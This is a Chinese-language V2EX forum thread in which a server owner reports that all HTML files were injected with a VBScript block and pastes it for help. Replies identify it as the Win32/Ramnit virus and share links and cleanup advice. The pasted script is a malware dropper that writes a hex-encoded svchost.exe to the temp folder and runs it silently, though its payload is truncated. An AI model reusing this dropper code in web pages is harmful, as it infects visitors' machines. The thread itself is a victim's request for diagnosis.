大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript

2016-01-12 09:39:57 +08:00
 blakefan

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

安全不懂啊,懂的 v 友指教一下

5679 次点击
所在节点    服务器
13 条回复
zhanglp888
2016-01-12 09:51:31 +08:00
Win32/Ramnit
https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRamnit

dll 文件也会有问题,
hicdn
2016-01-12 10:30:24 +08:00
这个是在服务器上看到的还是在浏览器里看到的
chinafeng
2016-01-12 10:47:55 +08:00
这是运行一个文件, svchost.exe, 目测是木马
bigtan
2016-01-12 10:54:05 +08:00
中过这个病毒
Moker
2016-01-12 10:59:31 +08:00
前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
hienchu
2016-01-12 11:18:17 +08:00
怎么被入侵的?
ibcker
2016-01-12 12:03:26 +08:00
等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
am241
2016-01-12 12:08:39 +08:00
这种病毒十年前就不好用了吧
billyu
2016-01-12 12:32:40 +08:00
我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
maskerTUI
2016-01-12 12:38:03 +08:00
/t/248061
visonme
2016-01-12 13:03:00 +08:00
https://www.abuse.ch/?p=2842

对你了解这种类别的病毒有帮助
blakefan
2016-01-12 14:57:02 +08:00
网页木马程序
prondtoo
2016-01-29 16:13:57 +08:00
刚弄好 nexpose ,有需要可以帮你扫一下。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/250050

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX